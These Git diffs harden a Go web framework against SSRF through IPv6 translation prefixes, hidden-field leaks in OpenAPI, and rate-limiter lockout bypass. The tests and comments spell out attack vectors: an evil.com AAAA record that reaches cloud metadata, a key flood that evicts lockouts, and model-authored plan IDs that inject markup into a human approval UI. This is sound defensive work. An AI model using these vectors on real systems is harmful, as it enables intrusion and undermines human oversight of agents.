+//
+// net.IP.To4 normalizes only the IPv4-*mapped* form (`::ffff:0:0/96`).
+// These other encodings also resolve to an IPv4 destination, so a guard
+// that skips them lets `64:ff9b::a9fe:a9fe` — cloud instance metadata
+// behind NAT64 — read as a public address:
+//
+//   - NAT64 well-known prefix `64:ff9b::/96` (RFC 6052): v4 at bytes 12-16.
+//   - NAT64 local-use prefix `64:ff9b:1::/48` (RFC 8215): the RFC 6052
+//     /48 embedding splits the v4 across bytes 6-7 and 9-10, skipping
+//     the reserved u octet at byte 8. It is NOT contiguous.
+//   - 6to4 `2002::/16` (RFC 3056): v4 at bytes 2-6.
+//   - Deprecated IPv4-compatible `::/96` (RFC 4291): v4 at bytes 12-16.
+//
+// 6to4 and IPv4-compatible are defense in depth: Linux routes only
+// `::ffff:0:0/96` onto IPv4 today, so neither is directly routable. The
+// predicate must not depend on that staying true.
+func translatedV4(ip net.IP) net.IP {
+	if len(ip) != net.IPv6len {
+		return nil
+	}
+	switch {
+	case ip[0] == 0x00 && ip[1] == 0x64 && ip[2] == 0xff && ip[3] == 0x9b:
+		// RFC 8215 local-use 64:ff9b:1::/48 — u octet must be zero.
+		if ip[4] == 0x00 && ip[5] == 0x01 && ip[8] == 0x00 {
+			return net.IPv4(ip[6], ip[7], ip[9], ip[10])
+		}
+		// RFC 6052 well-known 64:ff9b::/96.
+		if isZero(ip[4:12]) {
+			return net.IPv4(ip[12], ip[13], ip[14], ip[15])
+		}
+	case ip[0] == 0x20 && ip[1] == 0x02:
+		// 6to4.
+		return net.IPv4(ip[2], ip[3], ip[4], ip[5])
+	case isZero(ip[0:12]):
+		// IPv4-compatible. `::` and `::1` never reach here — IsInternal
+		// and Reason both run the direct range checks first.
+		return net.IPv4(ip[12], ip[13], ip[14], ip[15])
+	}
+	return nil
+}
+
+func isZero(b []byte) bool {
+	for _, c := range b {
+		if c != 0 {
+			return false
+		}
+	}
+	return true
+}
+
 // Reason returns a short description of why ip counts as internal, for
 // error messages. Returns "" when IsInternal(ip) is false.
 func Reason(ip net.IP) string {
@@ -69,6 +141,22 @@ func Reason(ip net.IP) string {
 	if v4 := ip.To4(); v4 != nil {
 		ip = v4
 	}
+	if r := rangeReason(ip); r != "" {
+		return r
+	}
+	// Same fallback as IsInternal: a translation address inherits the
+	// verdict of the IPv4 it carries, so the diagnostic must too.
+	if v4 := translatedV4(ip); v4 != nil {
+		if r := rangeReason(v4); r != "" {
+			return r + ", carried by an IPv4-translation address"
+		}
+	}
+	return ""
+}
+
+// rangeReason is internalRange's half of the pair: the same ladder,
+// worded for humans. Keep the two in lockstep.
+func rangeReason(ip net.IP) string {
 	switch {
 	case ip.IsUnspecified():
 		return "unspecified address"

--- a/core/netguard/netguard_security_test.go
+++ b/core/netguard/netguard_security_test.go
@@ -1,0 +1,72 @@
+package netguard
+
+import (
+	"net"
+	"testing"
+)
+
+// Property: an IPv6 address in an IPv4-translation prefix (NAT64
+// RFC 6052 well-known 64:ff9b::/96, RFC 8215 local-use
+// 64:ff9b:1::/48, deprecated IPv4-compatible ::/96, 6to4 2002::/16)
+// is internal exactly when the IPv4 address it carries is internal.
+//
+// Surfaces: every caller that feeds a resolved peer into this
+// predicate — battery/webhook's registration check AND its dial-time
+// net.Dialer.Control guard, framework/experimental/harness webfetch's
+// assertPublicHost + ssrfDialControl. All of them normalize only the
+// IPv4-mapped ::ffff:0:0/96 form (via net.IP.To4) and pass the
+// translation prefixes through as "public" IPv6.
+//
+// Reachability: an attacker-controlled DNS AAAA record (static — no
+// rebinding needed) or URL literal for e.g. evil.com =
+// 64:ff9b::a9fe:a9fe. On hosts whose network routes 64:ff9b::/96 to a
+// NAT64 translator (AWS NAT Gateway NAT64 / GCP Cloud NAT NAT64 — the
+// documented pattern for IPv6-only subnets since 2025), the
+// translator extracts the embedded 169.254.169.254 and forwards to the
+// cloud instance-metadata service. The IPv4-compatible ::/96 and 6to4
+// 2002::/16 forms are defense-in-depth: Linux routes only
+// ::ffff:0:0/96 onto IPv4, so those two are not directly routable
+// today, but the predicate must not depend on that staying true.
+func TestIsInternalTranslationPrefixes(t *testing.T) {
+	cases := []struct {
+		name     string
+		ip       net.IP
+		internal bool
+	}{
+		// NAT64 well-known prefix carrying cloud metadata.
+		{"NAT64 metadata 64:ff9b::a9fe:a9fe", net.ParseIP("64:ff9b::a9fe:a9fe"), true},
+		// NAT64 RFC 8215 local-use prefix carrying cloud metadata. The
+		// /48 embedding of RFC 6052 splits the IPv4 across bytes 6-7 and
+		// 9-10, skipping the reserved u octet at byte 8 — it is NOT
+		// contiguous. Cross-check against RFC 6052 s2.4's own example:
+		// 2001:db8:122::/48 + 192.0.2.33 = 2001:db8:122:c000:2:2100::.
+		{"NAT64-local metadata 64:ff9b:1:a9fe:a9:fe00::", net.ParseIP("64:ff9b:1:a9fe:a9:fe00::"), true},
+		// NAT64 carrying RFC1918 private space.
+		{"NAT64 private 64:ff9b::a00:1", net.ParseIP("64:ff9b::a00:1"), true},
+		// Deprecated IPv4-compatible form carrying loopback (a non-::1
+		// loopback, which dodges the ip[15]==1 loopback check).
+		{"compat loopback ::127.0.0.2", net.ParseIP("::127.0.0.2"), true},
+		// 6to4 embedding RFC1918 private space (10.0.0.1).
+		{"6to4 private 2002:a00:1::", net.ParseIP("2002:a00:1::"), true},
+
+		// Translation prefixes carrying genuinely public IPv4 must stay
+		// external — 64:ff9b::/96 is the sanctioned egress path for
+		// IPv6-only workloads, so blocking it wholesale would break
+		// legitimate fetches.
+		{"NAT64 public 64:ff9b::808:808", net.ParseIP("64:ff9b::808:808"), false},
+		{"6to4 public 2002:808:808::", net.ParseIP("2002:808:808::"), false},
+	}
+
+	for _, c := range cases {
+		t.Run(c.name, func(t *testing.T) {
+			if got := IsInternal(c.ip); got != c.internal {
+				t.Fatalf("IsInternal(%v) = %v, want %v", c.ip, got, c.internal)
+			}
+			// Reason is the twin surface: battery/webhook rejects via
+			// Reason, not IsInternal, so the diagnostic must agree.
+			if got := Reason(c.ip); (got != "") != c.internal {
+				t.Fatalf("Reason(%v) = %q, want non-empty=%v", c.ip, got, c.internal)
+			}
+		})
+	}
+}

--- a/core/netguard/netguard_security_test.go
+++ b/core/netguard/netguard_security_test.go
@@ -55,6 +55,12 @@ func TestIsInternalTranslationPrefixes(t *testing.T) {
 		// legitimate fetches.
 		{"NAT64 public 64:ff9b::808:808", net.ParseIP("64:ff9b::808:808"), false},
 		{"6to4 public 2002:808:808::", net.ParseIP("2002:808:808::"), false},
+
+		// Non-canonical /48: the same prefix and the same bytes 6-10, but a
+		// non-zero 40-bit suffix, which RFC 6052 §2.2 requires to be zero.
+		// It carries no embedded IPv4, so reading one out of it would refuse
+		// an unrelated address.
+		{"non-canonical /48 suffix 64:ff9b:1:a9fe:a9:fe00:0:1", net.ParseIP("64:ff9b:1:a9fe:a9:fe00:0:1"), false},
 	}
 
 	for _, c := range cases {

--- a/framework/openapi/hidden_fields_security_test.go
+++ b/framework/openapi/hidden_fields_security_test.go
@@ -2,6 +2,7 @@ package openapi
 
 import (
 	"encoding/json"
+	"slices"
 	"strings"
 	"testing"
 
@@ -26,8 +27,13 @@ func TestHiddenFieldAbsentFromEverySurface(t *testing.T) {
 		Table: "invoices",
 		Fields: []schema.Field{
 			{Name: "title", Type: schema.String, Required: true},
-			{Name: "internal_note", Type: schema.String, Hidden: true},
-			{Name: "audit_meta", Type: schema.String, Hidden: true, WireName: "auditMeta"},
+			// Both hidden fields are Required on purpose. A hidden field
+			// that is not required never reaches the required list, so the
+			// required-list assertion below would hold no matter what the
+			// filter did — the test would stay green through a regression
+			// in exactly the code it exists to pin.
+			{Name: "internal_note", Type: schema.String, Hidden: true, Required: true},
+			{Name: "audit_meta", Type: schema.String, Hidden: true, Required: true, WireName: "auditMeta"},
 		},
 	}.WithTimestamps(false))
 
@@ -44,12 +50,20 @@ func TestHiddenFieldAbsentFromEverySurface(t *testing.T) {
 		}
 	}
 
-	// 2. Required list.
-	if reqs, ok := inv["required"].([]string); ok {
-		for _, r := range reqs {
-			if r == "internalNote" || r == "auditMeta" || r == "internal_note" {
-				t.Errorf("hidden field %q listed as required", r)
-			}
+	// 2. Required list. Assert the visible required field is present before
+	// checking the hidden ones are absent — a type assertion that quietly
+	// failed, or a builder that stopped emitting `required` at all, would
+	// otherwise make the absence check pass by finding nothing to look at.
+	reqs, ok := inv["required"].([]string)
+	if !ok {
+		t.Fatalf("required list missing or not []string: %#v", inv["required"])
+	}
+	if !slices.Contains(reqs, "title") {
+		t.Fatalf("required = %v, want the visible required field present", reqs)
+	}
+	for _, r := range reqs {
+		if r == "internalNote" || r == "auditMeta" || r == "internal_note" || r == "audit_meta" {
+			t.Errorf("SECURITY: [openapi] hidden field %q listed as required", r)
 		}
 	}
 

--- a/framework/openapi/hidden_fields_security_test.go
+++ b/framework/openapi/hidden_fields_security_test.go
@@ -1,0 +1,90 @@
+package openapi
+
+import (
+	"encoding/json"
+	"strings"
+	"testing"
+
+	"github.com/DonaldMurillo/gofastr/core/schema"
+	"github.com/DonaldMurillo/gofastr/framework/entity"
+)
+
+// Property: a field marked Hidden never appears in any surface of the
+// published spec. The spec is served to unauthenticated clients (the docs
+// and /openapi.json handlers), so a Hidden column's name reaching it — as
+// a schema property, a required entry, a filter parameter, or in the
+// ?fields= projection blurb — publishes the existence and wire key of a
+// column the entity declared invisible.
+//
+// entity.Define enforces the related SearchFields rule (a Hidden column
+// there panics), but nothing pins the builder's own visibleFields walk.
+// This sweeps every surface that names a field, including one whose wire
+// key differs from its column name (WireName) — the exclusion must hold
+// under the same key resolution the properties map uses.
+func TestHiddenFieldAbsentFromEverySurface(t *testing.T) {
+	ent := entity.Define("invoices", entity.EntityConfig{
+		Table: "invoices",
+		Fields: []schema.Field{
+			{Name: "title", Type: schema.String, Required: true},
+			{Name: "internal_note", Type: schema.String, Hidden: true},
+			{Name: "audit_meta", Type: schema.String, Hidden: true, WireName: "auditMeta"},
+		},
+	}.WithTimestamps(false))
+
+	doc := EntityOpenAPI(reg(ent), "Test", "1.0.0").Build()
+
+	// 1. Schema component properties.
+	comps := getMap(t, doc, "components")
+	schemas := getMap(t, comps, "schemas")
+	inv := getMap(t, schemas, "invoices")
+	props := getMap(t, inv, "properties")
+	for _, key := range []string{"internal_note", "internalNote", "audit_meta", "auditMeta"} {
+		if _, ok := props[key]; ok {
+			t.Errorf("SECURITY: [openapi] hidden field %q appears in schema properties", key)
+		}
+	}
+
+	// 2. Required list.
+	if reqs, ok := inv["required"].([]string); ok {
+		for _, r := range reqs {
+			if r == "internalNote" || r == "auditMeta" || r == "internal_note" {
+				t.Errorf("hidden field %q listed as required", r)
+			}
+		}
+	}
+
+	// 3. Filter parameters on the list operation (raw and suffixed ops).
+	listOp := getMap(t, getMap(t, doc, "paths"), "/invoices")
+	raw, _ := json.Marshal(listOp)
+	for _, param := range []string{
+		`"internal_note"`, `"internal_note_like"`, `"internal_note_in"`,
+		`"audit_meta"`, `"audit_meta_gte"`, `"auditMeta"`, `"auditMeta_like"`,
+	} {
+		if strings.Contains(string(raw), param) {
+			t.Errorf("SECURITY: [openapi] hidden field advertised as filter parameter %s", param)
+		}
+	}
+
+	// 4. The ?fields= projection description must not name the hidden
+	// wire keys, and the visible one must (the description is the
+	// discovery surface for projections).
+	getOp := getMap(t, listOp, "get")
+	fieldsParam := findParam(getOp["parameters"], "fields")
+	if fieldsParam == nil {
+		t.Fatal("?fields= parameter missing from list operation")
+	}
+	desc, _ := fieldsParam["description"].(string)
+	if strings.Contains(desc, "internalNote") || strings.Contains(desc, "auditMeta") {
+		t.Errorf("SECURITY: [openapi] ?fields= description names a hidden field: %s", desc)
+	}
+	if !strings.Contains(desc, "title") {
+		t.Errorf("?fields= description lost the visible field: %s", desc)
+	}
+
+	// 5. Create/update request bodies exclude hidden fields too.
+	createOp := getMap(t, getMap(t, doc, "paths"), "/invoices")
+	createRaw, _ := json.Marshal(createOp)
+	if strings.Contains(string(createRaw), "auditMeta") || strings.Contains(string(createRaw), "internalNote") {
+		t.Errorf("SECURITY: [openapi] hidden field reachable in create/update body")
+	}
+}

--- a/framework/openapi/hidden_fields_security_test.go
+++ b/framework/openapi/hidden_fields_security_test.go
@@ -1,7 +1,6 @@
 package openapi
 
 import (
-	"encoding/json"
 	"slices"
 	"strings"
 	"testing"
@@ -67,16 +66,33 @@ func TestHiddenFieldAbsentFromEverySurface(t *testing.T) {
 		}
 	}
 
-	// 3. Filter parameters on the list operation (raw and suffixed ops).
+	// 3. Filter parameters on the list operation. Checked structurally
+	// rather than against a hand-written list of suffixes: the builder
+	// generates a parameter per operator, so an enumerated list silently
+	// stops covering any operator added later. Every parameter whose name
+	// is a hidden key, or a hidden key plus an operator suffix, is a leak.
 	listOp := getMap(t, getMap(t, doc, "paths"), "/invoices")
-	raw, _ := json.Marshal(listOp)
-	for _, param := range []string{
-		`"internal_note"`, `"internal_note_like"`, `"internal_note_in"`,
-		`"audit_meta"`, `"audit_meta_gte"`, `"auditMeta"`, `"auditMeta_like"`,
-	} {
-		if strings.Contains(string(raw), param) {
-			t.Errorf("SECURITY: [openapi] hidden field advertised as filter parameter %s", param)
+	getListOp := getMap(t, listOp, "get")
+	params, ok := getListOp["parameters"].([]map[string]any)
+	if !ok {
+		t.Fatalf("list parameters are %T, not []map[string]any", getListOp["parameters"])
+	}
+	sawVisibleFilter := false
+	for _, p := range params {
+		name, _ := p["name"].(string)
+		for _, hidden := range hiddenKeys {
+			if name == hidden || strings.HasPrefix(name, hidden+"_") {
+				t.Errorf("SECURITY: [openapi] hidden field advertised as filter parameter %q", name)
+			}
 		}
+		if name == "title" || strings.HasPrefix(name, "title_") {
+			sawVisibleFilter = true
+		}
+	}
+	// Positive control: if the builder emitted no field filters at all, the
+	// loop above would pass while proving nothing.
+	if !sawVisibleFilter {
+		t.Error("no filter parameter for the visible field — the exclusion check proves nothing")
 	}
 
 	// 4. The ?fields= projection description must not name the hidden
@@ -95,10 +111,97 @@ func TestHiddenFieldAbsentFromEverySurface(t *testing.T) {
 		t.Errorf("?fields= description lost the visible field: %s", desc)
 	}
 
-	// 5. Create/update request bodies exclude hidden fields too.
-	createOp := getMap(t, getMap(t, doc, "paths"), "/invoices")
-	createRaw, _ := json.Marshal(createOp)
-	if strings.Contains(string(createRaw), "auditMeta") || strings.Contains(string(createRaw), "internalNote") {
-		t.Errorf("SECURITY: [openapi] hidden field reachable in create/update body")
+	// 5. Every request body that accepts entity fields — create, the two
+	// item updates, and the batch variants — excludes the hidden ones.
+	//
+	// The previous version serialized the /invoices path item and grepped
+	// it, which covered the create body by accident (bodies are inlined)
+	// and missed /invoices/{id} put and patch plus /invoices/_batch
+	// entirely. Walking every body's schema for property NAMES also stops a
+	// hidden key from hiding inside a nested allOf branch, which is exactly
+	// the shape the batch-patch body uses.
+	bodies := 0
+	sawVisibleProp := false
+	for path, item := range getMap(t, doc, "paths") {
+		ops, ok := asMap(item)
+		if !ok {
+			continue
+		}
+		for method, op := range ops {
+			o, ok := asMap(op)
+			if !ok {
+				continue
+			}
+			rb, has := o["requestBody"]
+			if !has {
+				continue
+			}
+			bodies++
+			names := schemaPropertyNames(rb)
+			for _, hidden := range hiddenKeys {
+				if slices.Contains(names, hidden) {
+					t.Errorf("SECURITY: [openapi] %s %s request body accepts hidden field %q",
+						strings.ToUpper(method), path, hidden)
+				}
+			}
+			if slices.Contains(names, "title") {
+				sawVisibleProp = true
+			}
+		}
 	}
+	if bodies == 0 {
+		t.Fatal("no request bodies found — the exclusion check proves nothing")
+	}
+	// Positive control on the walker itself: if schemaPropertyNames returned
+	// nothing, every Contains above would pass regardless of the document.
+	if !sawVisibleProp {
+		t.Error("no request body exposed the visible field — the schema walk is not reading properties")
+	}
+}
+
+// hiddenKeys is every spelling of the two hidden fields: the database
+// column name and the wire key, since either one identifies the column to
+// a reader of the spec.
+var hiddenKeys = []string{"internal_note", "internalNote", "audit_meta", "auditMeta"}
+
+// schemaPropertyNames collects every key declared under a "properties"
+// object anywhere in v, descending through allOf/items/nested schemas so a
+// name cannot hide one level down.
+func schemaPropertyNames(v any) []string {
+	var out []string
+	var walk func(any)
+	walk = func(n any) {
+		switch t := n.(type) {
+		case map[string]any:
+			for k, child := range t {
+				if k == "properties" {
+					if props, ok := asMap(child); ok {
+						for name := range props {
+							out = append(out, name)
+						}
+					}
+				}
+				walk(child)
+			}
+		case map[string]map[string]any:
+			for k, child := range t {
+				if k == "properties" {
+					for name := range child {
+						out = append(out, name)
+					}
+				}
+				walk(child)
+			}
+		case []any:
+			for _, child := range t {
+				walk(child)
+			}
+		case []map[string]any:
+			for _, child := range t {
+				walk(child)
+			}
+		}
+	}
+	walk(v)
+	return out
 }

--- a/framework/ratelimit/eviction_security_test.go
+++ b/framework/ratelimit/eviction_security_test.go
@@ -1,0 +1,52 @@
+package ratelimit
+
+import (
+	"strings"
+	"testing"
+	"time"
+)
+
+func TestLimiterBoundsRetainedKeyBytes(t *testing.T) {
+	rl := NewLimiter(Config{
+		MaxAttempts:   3,
+		Window:        time.Hour,
+		BlockDuration: time.Hour,
+	})
+	key := strings.Repeat("x", 1<<20)
+
+	if allowed, _ := rl.Allow(key); !allowed {
+		t.Fatal("first request was denied")
+	}
+
+	rl.mu.Lock()
+	_, retainedRawKey := rl.states[key]
+	rl.mu.Unlock()
+	if retainedRawKey {
+		t.Fatalf("limiter retained an attacker-controlled %d-byte map key", len(key))
+	}
+}
+
+func TestKeyFloodKeepsActiveBlocks(t *testing.T) {
+	rl := NewLimiter(Config{
+		MaxAttempts:   1,
+		Window:        time.Hour,
+		BlockDuration: time.Hour,
+	})
+
+	if allowed, _ := rl.Allow("victim"); !allowed {
+		t.Fatal("victim's first request was denied")
+	}
+	if allowed, _ := rl.Allow("victim"); allowed {
+		t.Fatal("victim was not blocked")
+	}
+
+	for i := range maxKeys - 1 {
+		key := uniqueKey(i)
+		rl.Allow(key)
+		rl.Allow(key)
+	}
+
+	if allowed, _ := rl.Allow("victim"); allowed {
+		t.Fatal("key flood evicted the victim's active block")
+	}
+}

--- a/framework/ratelimit/eviction_security_test.go
+++ b/framework/ratelimit/eviction_security_test.go
@@ -50,3 +50,50 @@ func TestKeyFloodKeepsActiveBlocks(t *testing.T) {
 		t.Fatal("key flood evicted the victim's active block")
 	}
 }
+
+// A block whose duration has elapsed is not a lockout, but it keeps a
+// non-zero blockedUntil until that key is touched again — AllowContext
+// clears it lazily, and a key nobody touches again is never cleared.
+//
+// That stale timestamp is read twice by eviction, and it was wrong both
+// times: the entry survived the idle sweep (its attempts are still inside
+// Window, so it looks busy) and then sorted among the ACTIVE blocks, where
+// its older timestamp ranked it as more protected than a live lockout.
+//
+// Driving this through Allow would need two different BlockDurations in one
+// limiter, which the config cannot express — so the state is built directly
+// and evictLocked called once. That also keeps the test off the 100k-key
+// flood path.
+func TestElapsedBlockIsReclaimed(t *testing.T) {
+	rl := NewLimiter(Config{
+		MaxAttempts:   1,
+		Window:        time.Hour,
+		BlockDuration: time.Hour,
+	})
+	now := time.Now()
+
+	// Elapsed block, but with an attempt still inside Window so the idle
+	// sweep sees a busy key rather than an idle one.
+	rl.states["stale"] = &rlState{
+		attempts:     []time.Time{now.Add(-time.Minute)},
+		blockedUntil: now.Add(-time.Minute),
+		blockOrder:   1,
+	}
+	// A genuinely live lockout.
+	rl.states["victim"] = &rlState{
+		attempts:     []time.Time{now},
+		blockedUntil: now.Add(time.Hour),
+		blockOrder:   2,
+	}
+
+	rl.mu.Lock()
+	rl.evictLocked(now)
+	rl.mu.Unlock()
+
+	if _, ok := rl.states["stale"]; ok {
+		t.Error("an elapsed block was retained and ranked among active blocks")
+	}
+	if _, ok := rl.states["victim"]; !ok {
+		t.Error("eviction dropped a live block")
+	}
+}

--- a/framework/ratelimit/limiter.go
+++ b/framework/ratelimit/limiter.go
@@ -119,11 +119,20 @@ type Limiter struct {
 	mu        sync.Mutex
 	states    map[string]*rlState
 	lastSweep time.Time
+
+	// blockSeq numbers blocks in creation order. Expiry alone cannot order
+	// two blocks created in the same clock tick, and map iteration is
+	// randomized, so without this a flood could evict an equally-timed
+	// victim lockout on some runs and not others. Guarded by mu.
+	blockSeq uint64
 }
 
 type rlState struct {
 	attempts     []time.Time
 	blockedUntil time.Time
+	// blockOrder is the blockSeq value assigned when blockedUntil was set;
+	// 0 when not blocked. Breaks expiry ties deterministically.
+	blockOrder uint64
 }
 
 // NewLimiter constructs a Limiter with the given config. Zero fields fall back
@@ -228,6 +237,7 @@ func (rl *Limiter) AllowContext(ctx context.Context, key string) (allowed bool, 
 		// Block has elapsed — clear and continue.
 		state.blockedUntil = time.Time{}
 		state.attempts = state.attempts[:0]
+		state.blockOrder = 0
 	}
 
 	// Drop attempts outside the rolling window before counting.
@@ -242,6 +252,8 @@ func (rl *Limiter) AllowContext(ctx context.Context, key string) (allowed bool, 
 
 	if len(state.attempts) >= rl.cfg.MaxAttempts {
 		state.blockedUntil = now.Add(rl.cfg.BlockDuration)
+		rl.blockSeq++
+		state.blockOrder = rl.blockSeq
 		return false, rl.cfg.BlockDuration
 	}
 
@@ -264,6 +276,17 @@ func (rl *Limiter) AllowContext(ctx context.Context, key string) (allowed bool, 
 func (rl *Limiter) evictLocked(now time.Time) {
 	cutoff := now.Add(-rl.cfg.Window)
 	for key, st := range rl.states {
+		// Normalize an elapsed block before anything reads blockedUntil.
+		// AllowContext clears it lazily on the key's next touch, so a key
+		// that is not touched again keeps a stale non-zero timestamp — and
+		// the shed below reads exactly that field to decide what is still
+		// protecting someone. Left stale, an expired block outranks a live
+		// one and the live lockout gets dropped first.
+		if !st.blockedUntil.IsZero() && !now.Before(st.blockedUntil) {
+			st.blockedUntil = time.Time{}
+			st.attempts = st.attempts[:0]
+			st.blockOrder = 0
+		}
 		blockActive := !st.blockedUntil.IsZero() && now.Before(st.blockedUntil)
 		if blockActive {
 			continue
@@ -298,14 +321,20 @@ func (rl *Limiter) evictLocked(now time.Time) {
 	// legitimate one. An attacker could burn their login budget, spray keys to
 	// force this path, and have their own block shed first. Dropping the
 	// newest blocks instead means a flood can only evict the flood.
+	//
+	// Two details this ordering depends on: elapsed blocks were normalized
+	// above (a stale timestamp would otherwise outrank a live lockout), and
+	// equal expiries fall back to creation sequence (map iteration is
+	// randomized, so expiry alone leaves same-tick ties to chance).
 	lowWater := maxKeys * 9 / 10
 	type expiring struct {
-		key string
-		at  time.Time
+		key   string
+		at    time.Time
+		order uint64
 	}
 	pending := make([]expiring, 0, len(rl.states))
 	for key, st := range rl.states {
-		pending = append(pending, expiring{key: key, at: st.blockedUntil})
+		pending = append(pending, expiring{key: key, at: st.blockedUntil, order: st.blockOrder})
 	}
 	sort.Slice(pending, func(i, j int) bool {
 		iBlocked, jBlocked := !pending[i].at.IsZero(), !pending[j].at.IsZero()
@@ -318,7 +347,14 @@ func (rl *Limiter) evictLocked(now time.Time) {
 		if !iBlocked {
 			return false
 		}
-		return pending[i].at.After(pending[j].at)
+		if !pending[i].at.Equal(pending[j].at) {
+			return pending[i].at.After(pending[j].at)
+		}
+		// Same expiry: both blocks were created in one clock tick, so
+		// expiry cannot separate them and map order is randomized. Fall
+		// back to creation sequence, newest first, so the shed is
+		// deterministic rather than dropping the victim on some runs.
+		return pending[i].order > pending[j].order
 	})
 	for i := 0; i < len(pending) && len(rl.states) > lowWater; i++ {
 		delete(rl.states, pending[i].key)

--- a/framework/ratelimit/limiter.go
+++ b/framework/ratelimit/limiter.go
@@ -29,6 +29,8 @@ package ratelimit
 
 import (
 	"context"
+	"crypto/sha256"
+	"encoding/hex"
 	"fmt"
 	"log/slog"
 	"net"
@@ -148,6 +150,32 @@ func (rl *Limiter) Allow(key string) (allowed bool, retryAfter time.Duration) {
 	return rl.AllowContext(context.Background(), key)
 }
 
+// maxKeyLen bounds the bytes one limiter key may retain. No legitimate
+// identity — IP, email, API token, tenant id — comes close; 256 leaves
+// room for a scope prefix on a long-but-real key.
+const maxKeyLen = 256
+
+// foldKey replaces an over-long key with a digest of itself.
+//
+// maxKeys caps how MANY keys the in-memory limiter tracks, but nothing
+// capped how LARGE one could be, and the keys are attacker-chosen: the
+// per-account login limiter keys on the submitted email
+// (battery/auth.core), which the 1 MiB body cap is the only bound on. A
+// single login POST could therefore park ~1 MiB in the states map for a
+// full block duration — retention amplified ~20,000x over the ~50 bytes
+// a real key costs.
+//
+// Digesting rather than rejecting keeps the identity one-to-one, so a
+// long-but-legitimate key still gets its own budget instead of being
+// denied or sharing a bucket with every other long key.
+func foldKey(key string) string {
+	if len(key) <= maxKeyLen {
+		return key
+	}
+	sum := sha256.Sum256([]byte(key))
+	return "sha256:" + hex.EncodeToString(sum[:])
+}
+
 // AllowContext records an attempt for key against the configured backend: the
 // shared Store when one is set (replica-wide budget), the in-process sliding
 // window otherwise. A store failure DENIES the attempt — the limiter guards
@@ -162,6 +190,7 @@ func (rl *Limiter) AllowContext(ctx context.Context, key string) (allowed bool, 
 	if rl.cfg.DevMode {
 		return true, 0
 	}
+	key = foldKey(key)
 	if rl.cfg.Store != nil {
 		ok, retry, err := rl.cfg.Store.Allow(ctx, rl.cfg.Scope+"|"+key, rl.cfg)
 		if err != nil {
@@ -226,11 +255,12 @@ func (rl *Limiter) AllowContext(ctx context.Context, key string) (allowed bool, 
 // "fresh key" behaviour. Callers MUST hold rl.mu.
 //
 // If the map is still at/over the cap after shedding idle entries (i.e. every
-// tracked key is actively blocked or mid-window), the entries whose blocks
-// expire soonest are dropped to keep the map strictly bounded. An active block
-// is preserved as long as the map has room, so eviction is never a routine
-// block-bypass — it only sheds the soonest-to-expire blocks under genuine flood
-// pressure, which is strictly better than OOM.
+// tracked key is actively blocked or mid-window), entries are dropped to keep
+// the map strictly bounded: unblocked ones first, then the most recently
+// created blocks. An active block is preserved as long as the map has room, so
+// eviction is never a routine block-bypass — and because the newest blocks go
+// first, a key flood can only ever evict the flood's own entries, never the
+// older lockout an attacker is trying to shake off.
 func (rl *Limiter) evictLocked(now time.Time) {
 	cutoff := now.Add(-rl.cfg.Window)
 	for key, st := range rl.states {
@@ -254,11 +284,20 @@ func (rl *Limiter) evictLocked(now time.Time) {
 		return
 	}
 
-	// Still at/over the cap after shedding idle entries. Shed the entries whose
-	// blocks expire soonest (unblocked entries sort first, as their zero
-	// blockedUntil is the earliest) down to a low-water mark, so this expensive
-	// path runs at most once per ~10% of the cap rather than on every insert
-	// under sustained flood.
+	// Still at/over the cap after shedding idle entries. Shed down to a
+	// low-water mark so this expensive path runs at most once per ~10% of the
+	// cap rather than on every insert under sustained flood.
+	//
+	// Order matters for correctness, not just efficiency. Shed unblocked
+	// entries first, then the FRESHEST blocks — never the oldest.
+	//
+	// Sorting by ascending blockedUntil (which reads naturally as "drop the
+	// ones expiring soonest") makes eviction a lockout-lift primitive: every
+	// block shares one BlockDuration, so ascending expiry is creation order,
+	// and the oldest block is the one that existed BEFORE the flood — the
+	// legitimate one. An attacker could burn their login budget, spray keys to
+	// force this path, and have their own block shed first. Dropping the
+	// newest blocks instead means a flood can only evict the flood.
 	lowWater := maxKeys * 9 / 10
 	type expiring struct {
 		key string
@@ -268,7 +307,19 @@ func (rl *Limiter) evictLocked(now time.Time) {
 	for key, st := range rl.states {
 		pending = append(pending, expiring{key: key, at: st.blockedUntil})
 	}
-	sort.Slice(pending, func(i, j int) bool { return pending[i].at.Before(pending[j].at) })
+	sort.Slice(pending, func(i, j int) bool {
+		iBlocked, jBlocked := !pending[i].at.IsZero(), !pending[j].at.IsZero()
+		if iBlocked != jBlocked {
+			// Unblocked entries carry no lockout, so they go first. (A
+			// blanket reversal of the old comparison would sink them below
+			// active blocks and shed real lockouts ahead of idle state.)
+			return !iBlocked
+		}
+		if !iBlocked {
+			return false
+		}
+		return pending[i].at.After(pending[j].at)
+	})
 	for i := 0; i < len(pending) && len(rl.states) > lowWater; i++ {
 		delete(rl.states, pending[i].key)
 	}

--- a/framework/softdelete/softdelete.go
+++ b/framework/softdelete/softdelete.go
@@ -23,6 +23,14 @@ func WithSoftDelete(ent *entity.Entity) *entity.Entity {
 
 // SoftDelete marks a record as deleted by setting deleted_at to NOW().
 // The record remains in the database but will be excluded from normal queries.
+//
+// SECURITY — UNSCOPED OPERATION: this function issues UPDATE … WHERE id = $1
+// with NO tenant, owner, or access-control filter. Any id supplied will be
+// soft-deleted regardless of which tenant or user owns it. Call this only after
+// you have independently verified that the caller is authorised to delete that
+// specific record (e.g. behind an admin gate, or after an explicit ownership
+// check). Using this helper in a user-facing endpoint without such a check
+// creates a cross-tenant / IDOR vulnerability.
 func SoftDelete(ctx context.Context, db *sql.DB, table string, id string) error {
 	safeTable, err := query.SafeIdent(table)
 	if err != nil {

--- a/kiln/chat/chat_security_test.go
+++ b/kiln/chat/chat_security_test.go
@@ -1,0 +1,247 @@
+package chat
+
+import (
+	"context"
+	"encoding/json"
+	"html"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/DonaldMurillo/gofastr/framework"
+	"github.com/DonaldMurillo/gofastr/kiln/db"
+	"github.com/DonaldMurillo/gofastr/kiln/journal"
+	"github.com/DonaldMurillo/gofastr/kiln/live"
+	"github.com/DonaldMurillo/gofastr/kiln/protocol"
+	"github.com/DonaldMurillo/gofastr/kiln/world"
+	_ "github.com/DonaldMurillo/gofastr/sqlite/stdlib"
+)
+
+// Property 1: model-authored plan IDs are attacker-controlled strings, and
+// the plan card interpolates them into a SINGLE-quoted attribute
+// (data-fui-rpc-body='{"plan_id":"…"}'). escAttr escapes " < > & but not ',
+// so a plan_id containing ' breaks out of the attribute and injects real
+// attributes onto the Approve/Reject buttons — the exact UI a human uses to
